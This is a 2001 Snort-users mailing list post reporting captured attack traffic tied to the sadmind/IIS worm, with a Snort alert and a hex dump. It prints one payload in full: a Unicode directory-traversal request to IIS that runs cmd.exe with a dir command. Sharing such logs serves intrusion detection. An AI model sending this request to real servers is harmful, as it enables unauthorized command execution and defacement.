[Snort-users] Intrusion Detection Event

Claude Bailey Claude.Bailey at ...537...
Wed May 9 16:01:33 EDT 2001


The sample Internet data packet below was one of 28 we received from China
on 5/8/01 to our web-servers. The packet request includes a signature of the
sadmind/IIS worm and tries to load a DOS command box.  This attack is being
used to deface web-servers.

[**] WEB-MISC http directory traversal [**]
05/08-00:44:17.902561 202.107.205.193:34044 -> a.b.c.d:80
TCP TTL:236 TOS:0x0 ID:26709 IpLen:20 DgmLen:106 DF
***AP*** Seq: 0x75F5569F  Ack: 0x4307F098  Win: 0x2238  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
63 31 25 31 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79  c1%1c../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A  c+dir HTTP/1.0..
0D 0A                                            ..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.snort.org/pipermail/snort-users/attachments/20010509/fc165d33/attachment.html>


More information about the Snort-users mailing list